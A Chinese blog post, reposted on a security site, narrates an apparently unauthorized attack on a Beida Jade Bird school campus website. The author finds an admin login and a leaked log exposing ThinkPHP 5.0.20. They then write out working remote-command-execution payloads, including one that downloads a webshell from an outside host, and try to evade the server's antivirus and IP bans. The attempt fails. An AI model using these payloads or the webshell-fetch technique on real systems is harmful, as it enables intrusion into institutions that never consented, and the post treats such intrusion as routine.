记一次对北大青鸟某校区失败的渗透测试

admin 2020年9月14日16:58:50评论300 views字数 782阅读2分36秒阅读模式

记一次对北大青鸟某校区失败的渗透测试

一期超水的文章

事情的起因要从一只蝙蝠说起.....


记一次对北大青鸟某校区失败的渗透测试


连自己学校都不放过 这是人干的事? 不对 貌似每一个hxd都是先拿自己学校开刀的


记一次对北大青鸟某校区失败的渗透测试


话不多说,我们先打开网站瞧瞧


记一次对北大青鸟某校区失败的渗透测试


发现网站是PHP5.5.38的,阿帕奇2.4   大概主站看了一下没什么收获  


记一次对北大青鸟某校区失败的渗透测试


看见了个在线咨询好家伙直接把我屏蔽

主站看上去是没什么可以利用的了  于是逃出我的御剑

扫到了后台  http://xx.xxbdqn.cn/index/index/login.html


记一次对北大青鸟某校区失败的渗透测试


本来想着该一手返回包尝试绕过,,失败

看了下域名,寻思着这不会是TP的吧?


记一次对北大青鸟某校区失败的渗透测试


看看存不存在日志泄露.log  发现了这个


记一次对北大青鸟某校区失败的渗透测试


直接报错好家伙


记一次对北大青鸟某校区失败的渗透测试


代码往下翻Version:5.0.20好办了拿出我的Burp  开始对着输入框抓包


记一次对北大青鸟某校区失败的渗透测试


然后发送到 repeater里面 如图(以上)

然后把u=qsadmin&p=1232312412 删除掉 然后直接打payload

它使用了thinkphp5.0.20 网上有很多案例

Payload:_method=__construct&filter=system&a=命令   

比如net user , dir 之类的


记一次对北大青鸟某校区失败的渗透测试


记一次对北大青鸟某校区失败的渗透测试


RCE接下来方便多了

先测试一下echo写个文本

echo  "1111" »test.txt


记一次对北大青鸟某校区失败的渗透测试


记一次对北大青鸟某校区失败的渗透测试


失败了,怎么会这样 


记一次对北大青鸟某校区失败的渗透测试


发现assert和eval都禁用了 

记一次对北大青鸟某校区失败的渗透测试


假的,我不信

构造语句:

_method=__construct&filter[]=assert&method=get&server[REQUEST_METHOD]=file_put_contents('a.php',file_get_contents('http://xxx/a.php'))  


记一次对北大青鸟某校区失败的渗透测试


进程查看了一下有360


记一次对北大青鸟某校区失败的渗透测试


记一次对北大青鸟某校区失败的渗透测试


想了很多方法绕都不行


记一次对北大青鸟某校区失败的渗透测试

尝试绕过(马尝试了各种绕过方法)都没成功,一传马就Ban ip,,杀死进程也就那几个指令,又不能内核删,技术菜是原罪,在这里希望有懂得师傅可以请教。 

记一次对北大青鸟某校区失败的渗透测试

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2020年9月14日16:58:50
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   记一次对北大青鸟某校区失败的渗透测试http://cn-sec.com/archives/131822.html

发表评论

匿名网友 填写信息